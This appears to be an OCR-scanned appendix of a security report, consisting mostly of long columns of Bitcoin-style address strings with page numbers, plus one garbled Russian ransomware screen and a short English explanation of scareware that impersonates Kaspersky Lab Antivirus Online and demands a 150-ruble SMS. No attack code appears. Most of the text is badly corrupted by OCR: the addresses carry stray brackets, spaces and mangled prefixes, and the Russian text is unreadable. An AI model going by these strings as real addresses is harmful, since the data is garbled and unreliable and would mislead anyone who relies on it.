1G8gKqcEsfRxYTj82E38SdgbaopRBcuVzg 
1G8jumh6dxQHXNsJNcixL62ty3keaxMYXa 
1G8LsYQ2QkapGex7ETGX7ty3y1MqUapF32 
1G8pxLj8rWMMJKwEjpe54vW1Pkye5mZMGa 
1G8qRWkVGrq9W7Jm4cxhHAxnLiSmxRkuCl 
1G8sPqYiwriyQySC8DP4Q97XfRve7uyg66 
1G8yeeeMCHNMhjvjJNs6BrPS59hFbtmKCLi 
1G8YnaE9kms82TnzDcZNy1BvUY7c3SWNhA 
1G8ZGjN6FcFhxDPLCwQw/7sbT3goAkpDaho 
1G917RfCGEUTdf4kKLSexsfFtfvKCCnYhWh 
1G91KWtUKxtKeK2aBKzflxLccezYEyQZww 
1G92FJE2wqWKyhGqZdtZsWdfMecfLk99yG 
1G956KbEmu65bjpoW9dWERxMmLbZszmuXDY 
1G97pizW87ZXxBaDTFabuZ4qwEDjm7zcMZ 
1G9bbGeepFoN15GzTfSschvSsCW4bQiFc] 
1G9CGvoFe81jbh3WCh6PA7g3YXUU1WhCaz 
1G9cys1WUywZ1XD5NqedBgNtTysWXG9Mkp 
1G9d5iF6enn7sV8drmk5Dg1EdT6yApcxQXx 
1G9elodrdVdSzqGTwPZCMHnFr581DHX8Lg 
1G9e4kKG3PKory5ZKv4GRXzjztgrzN1Zr9 
1G9eBA78Qzi6msA87HQiIUhHEPwsKQfJ6M9N 
1LG9fYEHLIRTAL14PhqvGTUHCxSPemxE1FT 
1G9FYpLLafLPXAj7gwiKWiJNx9RVS1XUqZ 
1G9PNMPzun6RQDUQVHHAMSt8sLHcFSuSNm 
1G9pyM58hkDeaUJBCh6n4NRFwdEWLdCAMz 
1G9qchqQnVchtp99xyqkeEJc1DJ3AADoud 
1LG9qgTviSAoRJZQUVIWH7pjViY3Z9naQx7 
25578 


1G9Rq3mg32mKuh2RJhVjGC30de4W7DL1SE 
1G9rw77BsiPuenRePdLoUP1cZ2P38JuuCe 
1G9s21qsoiMMp8xYXBRiDdiXH654pSgzsP 
1G9S8usDBQisKAZWMDwnWdiZHFZW9nwYN6 
1G9UDJ3Qx5e4kTXTGhHWDxHgN8F47NL8YMF 
1G9ufSmzfAQ38a7GXiIEK41QgMGY1TH7QyA 
1G9yin96Y5qN7FF1HQ38GdDdVzk9XkL66] 
1GA1lokexnLvcBkV5LYcZfgoBEqeQ3CLVY9 
1Ga2a2xC12iY9TYQW7TzvjRCivDfCjhSV6 
1GA7G5TKY9iuZXcqhS5WKNL5J4S3Z9jmd8pC 
1GA8i6CFRyRb3CEIV9X6jCE91aAynM6h1Z 
1Ga80KC9OGKCvLyYeJizZxWh1MUEZQogi3Xo 
1Ga9tjzX4ue5rdx39vQ2Ax]9M3qGTRGFYY 
1GABxutugqRpC2vLwTaQ8s7TNPWSBVVLsP5 
1GaE2B6GicG7NkVQ1IMRdK8XG5B6v3qRFut 
1GAEdkwxM6A376qaJRRSNRFr3MLPRMyGzk 
1GAeeTVa4DaYmXSLTD4EwkRVNygtTomYzb 
1GaeKTKZA2QuPezj9XDG8vRdRvVbkHC4ze 
1GaEwCxXrc6Uqx5eS7hU7vWV9dNytyZPWCF 
LGAFmVnQrNijB8yT4tGkPwnVkE82i3Rf1H 
1GAG7dtcaaKSyodjMUCNV6QNkW4ZjZZE2L 
1GaHQxtLm8FasCPvT8XB9PifRXDxzMBdF6 
1GAi7jNhtbWZAJ8hHj7VSomeBRbMP2EMNU 
1GaK5cJvB9wKmt4Uowb4 TukVVdWJF3eNXb 
lgaktgn1lwki8FJzwYtT XMaU7CmfHMWSPo 
1LGAntHKS8NfG1Jwk50m1KsJRRcyqgGTiGV 
1GapT 7qWuQNPfLbRa36AiaENHvFE4TZhyWw 
1GapTxn17i825r11uYTY46cieiyNCMiyh2 
1GaQpiT1lm5usf9cPvaV1uZ4jR8gVJeHggj 
1GAqrAkAG6pB38bj3QBDvtaY3wGtQTpqvg 
1GARaXLnng9n8SboqvAgABj 7 UG4tGoCRD8 
1GariW8yRXowc3h5M9a0F8H5CWA2vVGMxB] 
1GaRMu44C7q9wGX6Y21f8PfmP96wzqwxbS 
LGAt1VnU28hnPyDETWmQF3bP67NnSluvTK 
1GAUfdzFVVezCW6SobBbHUWwbononqn6mC 


25519 


1GAvkKrf6VjLP9FhsPDyzttBwpBHLRmxfNz 
1GavurTQqxSNWPECvU80]EGCUFDcGQbjG6 
1GaVypf4aGWhaJmLnmUkLauxGNeN7xsSol1 
LGAWLhjFx11KoztS5fpT7bmyDfaWSrk19w 
1Gaz5DVokBqJ40gsGV1MJ7GNmMR7RqF3wu 
1Gb222TgRajonDXupW7021G72LdqFWiMye 
1Gb28tttnGNmubRmtVz7XkD94S4jLM5UA8 
1Gb5BbYBLkwkgTN95xASY340e2tatG76V8 
1Gb6LJ4rTRyxdGgYKZSM35Cx7bcWtz6S42 
1Gb7CurnBHHr9rqC9JX8tSufztwt226dka 
1GbAnDMhkKtfcUbkokFbYo8TLhgg4Wng9wi 
1GbCEb97P4TaWNm3fdG4WdCPoPyXyqu5fA 
1GBdao5TnQzpTcT5PwhRwKdVkbcpBunxtF 
1GBFa4pGx5a8WjL1ETRQvxVVSGTNYLWtgt 
1Gbg3s9KKkQ3eFfaU569pfxXVG7y6gMW1Jx 
1GBGG894ZQaVh3idK7MUN111Hdp3drUKFd 
1gBiEmMNb74UAa9nNC8A9Z4pPZcBh6ZZUu 
1GBkv7ykXp2CTeMrkCxpePm5jhb5uHSYQ3 
1GbM4ynmtLMDuknDRbGkR6biSWjhfDH59r 
1GBPZJbrxaWvPmnjSDHHnG9GWEuWYnYdCm 
1GBQxMYbDuUN9Yj40JG2cDsSwJPSbHZWpFhh 
1GBvqbb35kveaWSeNqbYxuH9XzpX3HSnTN 
1GBWFQzGGriy1jWq5WC8CugKZpyjcDNDk 
1GbwLnWpmyFpScSscK1v2uRoaLJYMWpds1 
1Gc3Mp4WCkKH742C6P1HuyAz8SDLpUJc5VS 
1GC9Kq2SG79566MhKW3qeAsB2amjaWKSuk 
1GcaaimEA5p80ZFW5nxyLDDjBGur6jURnS 
1GcB8wWNZs3QNnPYEXFVV3pFW4Y5i2ZigGQ 
1GcbfiAKU8BdRLDxrZWMRkhNJytfrtkeUT 
1LGCbLWykfVU22faxXd8xNEEBrfLRh4vrt8L 
1GcdziiwvWje93etZqggDYbwSQk7C7MRz9 
1GcgJPxexXvhoCeD26m4Y1R9rANx6jSxzRm 
1GCLCebwc3dWvV49vVUPiczC4MNrM9dAp3 
1GcQn6JFcQiEXHKjZN8BHoz2j7b3ENsyTD 
1GcRB7BPKRZbKCQLNy6DU1Vw1bYNfq5oWwx 
25580 


1GCRBQWNdXs207gu54WqMzlekud78znDuk 
1GcRQJddRQSqpiQMqpU64S3UCXnrMPdXzp 
1GCs6wZQr12QjFBR1guDGR4B2C5HMjH2Fx 
1GcSYSwWngxdFURwwusPNzCstPBcL80pga 
1GcSZGWLIiWETpjFqXq6gqrUagUx6URfxz3 
1GcTfGPGVuXTGSgDAPvPRUoLgTjf71raTf 
1GCVHncC3B1mWLJhmgC4JPar9569JHSXsK 
1GcVk6cYL5cNeSg9g32X22Q5AjSb9qBmMMR 
1GCwqds176nzU7pFcz4LqgRGMTNXTBBPzz 
1GcYEdc35Rxuq4TqmwxrmUfRioob1ho8sta 
1GcYtUepqpqleRccuigZ2qrjFx9b2EAUtY 
1Gd1FB92Pyhb7CCEkzA4TEPNKUBBUJDMsd 
1Gd1Y2PuJLFx2JtV9B63nYzyodYGKkxXzge 
1Gd2bfaVPnDjmYG6vmncsvb4Zssfj696h7 
1GD4nkSetnGhSctijmCod7YeqbAekqHGr1l 
1GD4Rn5SCEZCaeB2h4wttbfPv9WYcyR8Tz 
1Gd6pfeeDZP3CeADALUHfb5MTNxV90hPRr 
1Gd7SdWszFajSazJeESzuRxtujT 7RGwedK 
1GD8gQYMkEEqViZzYXL7xwjBCpWMNzkLqw 
1Gd9QDjGeRKhMx7pteMCieNNU6K2G2a5Co 
1GdctV5mZTDmZngqyktG4ghm6AtUXTgjPps 
1GdDuNAHhCyToj8zteCqqxk5o03pr5z4Wu3 
1GdEjsiiMJSSZB50WHzZmw3)Kc5kvQ8WtQ 
1GDF5vRi2EHwjaG97HuxEUKkJQXzGxDgKk 
1GdFHgS9CvfKKrf6EA1f9q2tRbk70GqNyA 
1GdGh8hTCFismVDSHtNemoBNwDuJrvwJkY 
1GdGjlg4FPKmUcpKod9DHOHHBKVDzétsch 
1GdgWUu6VhextTrmEuPnExmKF5SiSdSRZU 
1GDgY6mtxM5AJZFZsCymQ35tY8PYA36kKQ} 
1GDHSUpqHHe8Pob3i2LUbskLhh24aFujad 
LGDhTJf2NYNvs7Cf3zFhGtvp8PFArC4UnV 
1GDLDWLhPuJ9w2ZZPGmX3s4WQJWd2ho8st7 
1GDLoV9qpd1lyFEreQswNMzKvNrFXHFQa9R 
1GDmRSVDs1z]qFGeqYfdj2Kfuh1t3E2bSx 
1GdNaXQ1n1xHc9MVS8QOfrNYvphKcuvNyM 
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1GDQ5XhmXovxpJu5iFlel1QF3VPfxrgd1kD 
1GdUdKb2VruwyTjNlytbDfZMjce4zHmewn 
1GDwAncn]Jjxrz4dBH7EA7BmBAVJx5juKhG 
1GDWo043PybhSj9bQDRugj6DSWRREShayAs 
1GdWwKaWHbyL41phUiUyyDksmcuPnbKeuB 
1Gdy3uDFMocChuFpKdZ9hhUdeanLyVrhpL 
1GDYa7o0KfdQh86nZXQNbcymszLFRYCjZp6 
1GdYB2RYQWsCarSFmzW8Sco3jqwZyw1VQb 
1GdyEzVchxXj4EKr1FMbu9mKpsAN64NvksY 
1GDz7Gbc6HsqqgMXX7TsBGnRVV9phjJ6bW5 
LGE2ZhHbQQZMYgjsshEcYk9rHy2nceyCFvjJQ 
LGE9U6FTjjnpo8yUD5bhjJPjofmCxRweGRRg 
1GEac8KTUxTFKo11bzoKfQHpBEhbm8Q1B3 
1GEb7xjjmkKUVN8BvkJPRZYwG6zfdPQm2cf 
1GebRJhtathSCmKqwK1GBhRtbbqtrxF4kN 
1GECxYduAwpBMqNDBRbzTDiwWCehutakJp 
1GecZMfEtpWgEZaWXyGyehmuzXKCW9DhGL 
1GEe32coY2N2F57bn186p6HVnAWps7atWQ 
1GEeqQKAalbPwf3dmLfisy69NN8SHWWBXH 
1GEex3PCLMCMijFTo1Fi3rkanhriQHSCf6 
1GeGYFoEBrv8Bv8VZDdqEembPyxxpfyZjJ 
1GEhapjBkhXT5dMWXD9qUBNBKUGH5wM cq} 
1GEiSLVyCbpCsrY8gLi8h3eQbfc6e8briR 
1GEjEyxWy1qf86phrRZb2tms6LegnWVp8sX 
1GEjoM9BDeWsjHxUSNgPyZfb3YJTvxXq42z 
1GeqQb9P9MENYDFAJYokKBOM9uAvzuf1Y1h 
1GeSNLQwPVf]XRFIN4g2MshxT8UAB1vnLu 
1GesyWy61dTQfNqvAqqpHPCqmNMje68sczb 
1GET3HUUucNJbynop4V3YXDsXNwlgW2jKB 
1GeurTjvsrqMe5ZB2PW4cwdcW1puYkTjW7 
1LGEyT4RpphH5rnEz4E3yDUNPG7xxhdpjND 
1GezhhmKvpGSxmf1c7vw3TgSuaYDwxjyZG 
1GezYpGe9WHV2xZqCvsA3BQQ8z8U2tCRvb 
1lgeZzLGrVmNpDD8MoffyupU5ccu9ASisj 
1GF8MpKFeYxHPxGqeA2FDFetDieeQ9UMSIP 
25582 


BuHumaxuve! Oxnaitx nposep 
CHCTeEMEe OSHEPUKeH BPeAOHO 


Bawem KOMNbH Tepe Bupyc BPpeMeHH NOKHPOBSH, HO ero anrop 


NOCTOSHHO MEHRETCR MH OCTOHOBUMTE EFO HO DOHHbIN MOMEHT 6e 1A NpPOrpammel He 
NPeACTSeNAETCR GOSMOMHbIM Daa Tore 4uTos6 YASAUTb BPEAOHOCH Bupyc HEOGXOAUMO 
&Tb KGKOB H8 QEHHbIN MOMEHT y Bup SNrOpHTmM Whpposesnne”, ANA store 
a= sh aie eeu a aratwraens ican 


thd mo . omer - & ) 


Ha AatrHbet MOMENT ANTODHTM Weed>pOBAHHA BHpyCa Me TAKOB, NOKaNyACTA NoBTOpHTEe 
NoMeiTKy eule pas. 


#8 BSWEM KONMtibioTepe OWeH 
sopamerbt Brumanve: ni 
Buna) He MSMeHHT C 
oupS er 6 3 
OPS KECTKOTO AMCKa 


Basically, it attempts to impersonate Kaspersky Lab Antivirus Online and trick the infected 
user into thinking that Kaspersky has detected a piece of malware, has blocked it but since 
the malware changes its encryption algorithm the user has to send a SMS costing 150 rubles 
in order to receive the SMS that will block the malware. 
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1gFdvFa90P9YFL7j8N8hzShHEVbCoEUSm8 
1GfF7MJkQyZgfLhTmug3drizVf8nPNm5vU 
1LGFGiXLPi9ZakxcAYUPw7qNxkA3jN8fgoW 
1GFHdheTXgYUZmoH6ziRyEUSNvsWasjR5Z 
1GfHQGE6NevFzDd6s8F4nXSVoNLd4h8inQN 
1GFILHjJRYW39CiqgQPZJVEKeuG5mhzgSyB 
1LGFJe9Qbx5yAixfiJtFMQgcSQ8jQ2PdBe2g 
1GfkbcRFjiy3zgknxYgr7bEyEEbXJjBCbu 
1GfoCg2ZsZmA7Zh2ZJ1luSy23xsjroCfqoP 
1GfoTWv1g4xXJh2p4vgeGTNCsLtaBDB1CtZ 
1GFpqsvxPh7tYmKqhCCD5rp5iiApBT281w 
1LGFQpAQiHkTBNnyatMLwwSoQWsvAzwM79f 
1GfQYUhaNAiSfFogncB3UWH3grh6S3ut8y 
1GFrigC4eiBpqCTjJHACWRROVJAQNcFMvpW 
1GFroRp5XZMuewRap4W/vzTBDs]9wyfjye 
1GFT4XSvyQyt1Du1lsMSCyJiV7boMbdnCTn 
1GFtAyWYNanUXzfR6rz8BDQWMbVyV1JuHuP 
1LGfVQKYY7vf54diQ3yBB33yMeFooY1JNZr 
1GfwXD8z9RiI1CCYReMuNdPN2vRwvigx4zS 
1GfwycayDwSpdBDG2KzsE6CYXcJNcmsL36 
1GfxDzSzyBzRNiP5zXqaa32qybify4G7ro 
1GFzdJWiNhuoyTnBt6YtVsveK2ASNbLuW4 
1GfZSBuomSkEBtQUtzxddt8k1KrNeBGZgN 
1GG2iijBNxZvRB2iEJTy2FSgyuCPy3Y]gf 
1GG34RSWedxUzx3fJaC6hdxpQTajuRCq84 
1GG3rhqf6QLchESTxXfHoS5MZArDmSGKG12 
1Gg4ACwmxn4sbdR5Bbxo7fnnNsN9ZCkuLA 
1Gg51loSUs9VzRMQc3DevCHkL4swkjaGEq5 
1Gg7)GPvhp6NJhW1pHt5hdrabVPgmDbiAY 
1GG8bRsqvV6v9DzZJVKTqkg7oeubzjJghKgQ 
1Gg9ZQESnZu2Bqq1Ej8ilC8qNWeq6NxXSsc 
1GgAH9kytHspDTgrwWe30E9xiDZKRddnes 
1GgCjWB4KqaczbjJFZcACgAi779LftuuvS 
1GGDXWYsJqrQeuMLBE4SnXWizFvwrMoxEa 
1GGfec8cRVgJYixfY 9twauMnwL389S7fxX 
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1GG)k8DjqMSQSiGbtfJiYv8d63pqlm63Mb 
1Ggk4HinHG1KU61MADsfArZcz9fXCoxZ4o 
1GGm1pDwN4qp3AyWfP5hsswFWixm3TcHcw 
LGgNvE1z3CbvygtF KxAutoZtxv5myQ5Gbg 
1Ggo5ZUXmuYgqA2vMAPgugiZL3yyD2bgDoi 
1GGP4Zmq1LzNUAanofHCMvS6jZyjCvyrHw 
1GGpXVoDkAcreaMVSm5W/7rgjBGfw5RFH2u 
1GGRYQd68zalpHesAYy6XBeoUscX73xLhQ 
1GGw3xes4H8Az6ZAvPXAWzxPZgtBChdrS4 
1GGWmDgLpgpRFWPb4jcfGeZCpc2jenzhyZ 
1GgXFKMgJBpSSQKUQAUiIjAwUc7g3RAfgZ3 
1GGZmvCeQ1lermgXffroYBoj4uad7FgrG3 
1Gh2SJuWrckNTCQ512VmCNv1f8bcwoFbbD 
1Gh2SQa7v2MMH749TNSmzilMreC2aRQdjo 
1Gh2WJMEeqxS6xrulF8NbimtfdCqDEFB7q 
1GH37WECRIMWFsgVW8QZX60k3md46kAAuC 
1Gh3jn4FByB4pLRM9fX9Cz7WLnSbiaePgh 
1Gh6q5Sw9Sp7j7NFsnw5xzBv4flerCojy4 
1Gh6u28T7CxVWJepNWV4DbdwNzaGrkTuNP 
1GhAeA8mr5KjHifTxEbDRFL8CnXXk54wYk7 
LGHAPbwcuyPXc2PXtEt434cRgqH27hXbRc 
1LGHCPV1NTjtPXsvpV7Dk8hLrVgc87H39aq 
1GhdBsXwYzR78u9mLjDXosCS1c8CNCpw15 
1GHDgGktBGteFnDdyreGhUGuTQz6X8FJFT 
1Ghe8gQgZehuh7HuAPSUgesFzSWSQE6vX3 
LGhfgNVGFU4kiRMWRQcZsPQvQJ2TtvMUdT 
lghFjunq3hEZMeGwX]J8Eq6N5SyquULJ5eM 
1LGHGN7ZucX1MpaEWjc7pHmE6o0bxBvuXCCY 
1GHgQ1dTx6PsSb9X891bEaeXGixTkksduU 
LGHGWQw5pPflkCeFeUZ8KM8e5gy9PyW1hT 
1GHi4aJ1fscHN5kF1CHNXWAQM9Y2B1iko2 
1LGHirFrnY27j6cdczV59UHOUtDA7 9WDfw4 
1GHJt4B4B9Zpd3P4CwLxKRVGMnGx1EbRzD 
1LGhjTjdPQa5RQybf5zVtwDLYGvqSzhrDNn 
1GhL1lov35szRz8QuzFvsrunTZBWNAJRP4d 
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1LGhLxjVag5LjftvtgT kKHidcPNCPdKMhGH4 
LGHMCNvPZuC7mTSrAvSMGyiWc2aHkosx2e 
1L1GHmmtVdWN9Yco7EMxuMkCVAyRRZrfASAu 
1LGHoDLwGoZsc1c83mTXmRnZWBH7qq1Wphf 
1GHoVaxYc3qKX9KVWZqz2CRVkwe6S6S9Cr 
1GhPKDuRXt6YLHHjqrafg8TzLe24rkcjQD 
1GhqLBSywapYotbtp63HD7HZZMx9jxsh5G 
1GhS7dA6nNQAcRYOLG4F7XXCpdNyzk9edS 
LGHTP25ipMvp7kdFOMVFegwYrtzpQRmVbX 
1GhuSBCAKY7HxB 7vgfB7MMFoow7dYLpMv9 
1GHvhztP98jU3EPJMSDpFTSCNCSt5dm2L)J 
1GhWqDyGKCUzwPxgHY6hFhcRrQSXLSnhkz 
1Ghxxttgap3dCmR5aJQKgSRLdfR5Gwj95i 
1GHygBeScuARNJ6vpHxGjRnSyNxqbx7Yhj 
1GiAX3FQuPFfowMLRGLF XPveD9EQxCmDqG 
1GidGvVgQEtrqEphHpuh6gxt4D4pSncYvi 
1GiDrL1PfT1cr9qoQCtXvSZnZSHMBGfQ7R 
1LGiEtsWFvKPg3isBjQMwFKNyciPi2mGJ3q 
1Giez847FSoprfBJE14aFaCDFsQA35Xqm1 
1GiFtyKRfbSTX6xJoQ6X2ABkizhcMmQF3Z 
1Gih42QJfuQ6LpACSBGavjrRAAV7GSPDtW 
1GiJyoHkZkt7 DWPAKgLnwcCHMymthsxM1X 
1GiIMX4iUEQKWNwZMh]JrC9bj30gAuMMe6A 
1GiniLpRVFdGk82F6dWGKqwF f4yinzjgvD 
1LGiINUPMWurYeyTP3GP4cn2NsyW6yP6Xmto 
LGiTUFBziUfTiI4V9eEW37WE5UFfZg7j9aCg 
1GiTupVaEspiPt8MptFK5ZzjtZZ82tCbUS 
1GiVhZ74hPx1geynFfJEcrc2fT2LNEREfh 
1GizqTqx263BVXTuJVCXWMcdtkS7ANPP35 
1Gjl1ldsdsNyQubgibjCZHY51sN5xZwucdQ 
1GJ5xeFfontcrQiuxDmMeEwWMneuRyVbjnC 
1GJ80qbhopoYJRevloQWFZygEa3uPjYnKb 
1GJAccKkF3zqD3qpip1bbWDEJ6FdYstMVV 
1GJCV8QJTFORX9LKo4P1bf8dja54fcL3EC 
1GJcXjeyhbetePsFp7NYxCE59kGbL2vvHd 
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1GJeeY8z6u977K39hNhm4ghZXpboM5kKelo 
1GJET6EQWkySuCCzpb52L1x4a5Zoprhigc 
1GJezcDjLWgkxX20ZtwmxbVYxQTZHfJ4hdU 
1LGJFFijknCZVcwnZ9vpJmBGnGnwc3sjTW 
1LGJFnH7ZS60pKXHNDYTVW3iW4ZQQyjQ7rh 
1GJgckqBNF6P5KD4HT6kg6rTGgyM9qXio2 
1GJGCxkwNcS5VDWoehxLbfdm2EjiwoD7gp 
1LGJHg2T9StYUHBLLGCguzhdBC48Ep2rycD 
1LGjjvA8MCJqMSt92FQzwVykcfhzpWzbpJ1 
LGjJKXYLWV886ncPbhmv42RPOoCU8vVGmpsFQ 
1GjoVawg TUABVT 7V3LzvHkieYR6DehT2nF 
1GJQ2ucKaiQ5Pv38HVV1IsLxNNai32EZpFh 
1GJqbAz9n1HJ)geWvRZDUH4Yb1cCjb8sQKH 
1GjsDSoZvGtyKkicuAcKHQ81Wo5hsGptMi 
1GJTlaTB9bMwwogynffd3XEPJ3)J9J8QVow9 
1GjJTJUx3iwepNMYipmQ3gDWt1r69bK5eYF 
1GJtXCkTJw8jzrjJ7Gwu63CDSQSXhrDGKS 
1GJUu4vFvFC3sMPedtuNqXHayn4eA65s4r 
1GjUwciny3vXN1TrMrkcAv80pdaH2JHajB 
1GJwQmXvvzGt2wX1kABiZSrRRpLbcn6hwi 
1Gjx7HbehFzSakEGj3MKdh88dssDNc1Qmy 
1GJXccgAUwGCXptGFhVBNA8b7MN9tXNJjyg 
1GJYAUPMbXxUQLmu8pHxVp1C6rf4uMERz8 
1GJyiT4jkEnqP69yFYGTL7xiDtb5qEYwxy 
1LGjYXKv24q9zwamkpiNs3YVNceT26z8DiN 
1GK2TXroSQWz7wngTdwj/sfdgV4rbmp6h9 
1Gk4rPWX6vDWGHSHqFZ6ed3E87kmsZykwo 
1GK6TXgcLqkC3HBohxhyyF2MnCnanbHKSU 
1Gk7aei9NaDxQihRsLzVPw4eqnAQxt7YLC 
1Gk7LLHfPfzpFQB5maMiHDZt7Dt2b7cBh7 
1GkARcfCyDNaPqe6PwqkbdpnpUtT twdwbc 
1GKBH6Z8G58KSxSySaaHFWk5Ph2MQLXZM1 
1GKChZEjdhJ4rdz3Fasap6UoYED7sbmJV4 
1GkcsFHgisBgcYGkefUZJazEBDwFleDgQg 
1GKgUzuKKFQU1sKee1K8JRKdANWLITQZRC 
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1GkLf1fWTs7dwpq4D2p2w3uw5T3jJEFt77d 


1GknbbuWmP1Xqh3pdmHnBeWpg2gAAd3ywT 


1GKNdVUodRG45wHdbqzjk5iLjD9ywMPf38 
1Gknhwzj2xxDRm92G3jLUPZPfFHDcVQCUxv 
1GkKNQ431pqzMbV50ZEJCAJRxAcbLPtx3Ja 
1Gkqn6pu5U8ricJb2Y74RZBENe116th6Ec 
1GkR64SmMjJnPK7rxt5RjidyyL5E3LB59AF9 
1GKsBvt7i77ZGjiodX5QpnwAmtu6AEf71E 
1GKTgtsZ8GUCr3zZZCGWVxjczFQxbNVxiat 
1GKTwnkzHDqV13YgirXVwrzMQo6WsfdjJk 
1GkUy92ysUBYSXY8DmHmcCdXHMy5RR601q 
1GKxaY4P5fbjhsWHPsXAymNBaPsAsxXxFWw 
1GKyi5ZR4ChLV86PzY87Y)Jr5rA4jsPa5Em 
1GkYNcCCkTxckim7cV7hHMCy5kRFwnh3uUc 
1GkyPG8nFVBMpQWd57ZX6LweAMeMuxrybv 
1GL14pRluwe464Stz8zCYfV769TSZkZ1AA 
1GL2DDCbZdYLu9Dza86BMhxhP9RdkKgsjUJ 
1GL4mQTiX6kwqFYRXmtgG9056Sk9qthDtn 
1GL6tEhj90nR80B3vNgCD6FowkAciwZMJ9 
1GLCYFwaZ8UVaprCdDWS87AzVuaofzi2Y7e 
1GLNrhydU9CcGFs8VxNeYGkPqGV1r9kcDb 
1GLq2wsxaQStQTnLkVQwtuCPL2tal13t5Jz 
1GLQk1LWFoA2ENxqgLPwGwoJDfW6xqrTBQ 
1GLR1BBdZc5KX3tjTnhPyAuAcUBjm2BBWU 
1GLUXJMRVZS1TraFJB5KXQ7LCUThsqGzMb 
1GLv2YGeuCAhvqnH6ZBdA7JADS37cfp3pY 
1GLYf7wGLonb1RfjEVRYXvvj5cvbFjSycJ 
1LGLZfHJAJNEM60C8t1LCDp4XwgM6o0Xx3CZn 
1Gm31uZqb5TDzRc48mwx3d9wya3ZkZkQZK 
1Gm4xLy3hM527XWXwedstrQQc6YFA7NKti 
1GM6qcFJhvC7W1kXxqe5p6Vh8AehGFB4bp 
1GM7KcsgbNNgikod27R4xbYjJ6HTTFRG7e4 
1Gm7NLnJwinyy7Bjmem8dmt2cGbntKPukK 
1GM9Xr9vGw59kZhS45LcGij462R9KrG5vi 
1GMBzVbEQnd2W7bRTpUPXZJrFQiTPBUGEW 
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1LGMdJHKhNG2CLjZgSwH723axvfnATeUyWU 
LGMdwV3E2QYM9QpAUTKnxZZ1B9XCgwgJYw 
1GmDXsSSMHn]JfJUHgZz37eQQx3GcosARgt 
1GMExL5X12eUe2WfWkKuBstz5777)JB7Sit9 
1GmfQxoBHP7PRkFa25rKYHQCGeWHah¢2arf 
1GMG7iEY3TEhb2ePKm48VJR2DZr7tUM6p9 
1GMi4Uj7d1wZQSBVXx3dzVRa4RM80AVUSj 
LGMjVEfhPZPnLSoRFj3ferg6quwCnkwSBn 
1GmLYDxZrEKw2pEpjGNzkLs6g4KmVAoSWB 
1GMoCjQxXd8xLEerirDf]j3mucgwUwZLLQQ 
1GMr3bHxszyfARNbLSuNMahsiCXCN7XxD9 
1GmrbENZGRmvBCCocu8w6P]1q1C]WuXech 
1GMSgdbCxdiAzA98sWatEhkJQ6TU6tB28p 
1GmuCxDz9gaMmCkKosJRUNWvEyipetsveHXx 
1GmvCwwrl11gGZxCkCDpsEQhih8mVzZKNRBd 
1GmwPizjg7a6LTdpr9mAYqDxxGEZ6fjau 
1GmXJ5Ksn7U4kKSKMKiYywNBBGTKw86eCQW 
1GmXM5KSqTa2Ao0FQJUtiL2usqRrrMQxih6 
LlgMZQ5nDfw5d5mZw5GZp9WWoYXbPi4DMB 
1LGN2brc9ZbaGNw2XEjzk8CyYej9ADUDAAYf 
1Gn38eA6VmAtdpBt7ayuuTp4SkRgiLaHuB 
1Gn55MUXka2C9ENbviS8kfh25GCXM9FH2u 
LGnAKRYKQFn3JuVQFtelgHwWrlaj4KYJFo 
1GnaULDgK52LLEbXSjA9PiqVe6ZxNAb7EZ 
1GNcwxFédAj4uSgXVCns5FzFcrSfhURa8W 
1GndBPsLK5nbDbGKkbzTPWEf3QzzW7p6Sz 
1GndtX2Nw9GVA5Ayq8fy1LYBFdkszU8fbGP 
1GNduRh8icqa5siZWyS4EVY6QSox5FPhMC 
LGNdwqHp1We5U9bkSQmGKtoPrQqLaf1lcZ4 
1GNeV9gqLvGvZq6rg7KgTBYn1d44KxFEdR 
1LGnfTjgjcCj9BHDukKQ1927nLP7jxVoS4h6 
1LGNHmBd6b2tLq9SL9FSuTxkDh907WvydxX2 
lgnHozSMss4mNzACq2A93BkaADasrtExg 
1LGNi9Rm5JSKrPGswwTYFtodWZ8aYDssQf6 
LGNitVDkmdNHsUXgu8VFD2tMQQJ1xHpcnE 
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1GnmoP2Wr4zEeYKpdVgoibEEjD4hKtKmy8s 
LGnNVEAhPfz9y6PNncrrbEXyvAvxUmfy9m 
LGNp5jnLY6hH5fr6ZVKCcpj2NMAkLafjap 
LGNP5RQMsXgg/7X9mu5xs6S4DThrHjJY3w81 
1GnQTGgTFfDnPBdei8PNQCTLAYCA1xTTUP 
1GNR1IZwhYhQh9rPQyJUVCJjuZFRNwJ7SZBu 
lgnScsytYKGtTcB7ZCN5eAG7Dg7qpokwu 
LGnSQjnGmweYAX629hTk3jbEv7xPY5UT3} 
1LGNuLnMUPrAhK1FyNGqdj8xaJDZFRVtVC9 
LGNWANeKgDrEc6exFtjAZWZRfx7 1LuJvo72 
1GnwkuVfcg2DpVqJhwoQChR1GaqJkKMVJKLG 
1GnXKyM7SD6uSkXdr278wsgQQBGU4yobGM 
1GnZ5QA1CYdagPtB4s9D4P7JgLaSZrfSQR 
1Go3sdgApdWyU9PJPFNbykGTtHGAkiMYat 
1LGoANGrxw3MmLkTDeW5yLVFqMtmiGk3aiJ 
1GoBVEmmmmuJhPxw4krQd1GeAZfXVPQDvV 
1LGoFL5SQEFQihQhJSvgyGNVpHknayo8dAn 
1GogsCYYizrpcwbMksgC3FfdC38NFxB9uUQ 
1Go0ja991YX9KPo3K7y78Qc8sx5eaPQ2dNa 
1GojMg4uiqryYve5aaDz1JWnri4Bg8dzF2 
1GoMrXnsA8ZNWE6ntHZnzSdh6UULM8DqMwc 
1GoT4WTGBh3UvwbrVnNqudutZg82HC2qut 
1GoUw9dyzb2ue9Gquc61ilieMqSQHzeBEH 
1GovQ81qq8JyBAzcqK8T6CSUxpHf7BuFF8 
LGOWHRZ7b]8UpUxHWvExSESgH1B5nXHHwZ 
1GoxF6MQiKmzYSMEfhhpNoHBWC79Fk7oJX 
1Gp2QcpmvBD4LoS9ASKVxXWWCc6BjcoDTpFZ 
1GP3jPZQw9dzg1UQs8s6VGUWP]JjeTW2HJQB 
1GP48Z43GRDu6LqcowuGF181sjiGU8Snzw 
1GP5AExt21eRrcjkthzw4imiYEfUXhBxdC 
1GpBFWWDbbR1g1NU7Bgda4CToMjLMENjWD 
1GpbmEM4G64r9SeRv9HgW67BHqqHbPFgxT 
1GpDUreiPjak4ypJ8cib35srTZGUCmTmo5 
1GPdyrFc6niGFWPypFPxvgdAaJ1IczZNNNh 
1GpEFBVLVmTdjmo9ay5Hxty3qhyFGL9UWk 


25589 


1GpGU4dBhtJhvDSxsnupGr3sRGQTWRQwyG 
1GpGWV7FtAR2mMYUrFKLNWTS5bV3yMB4MG 
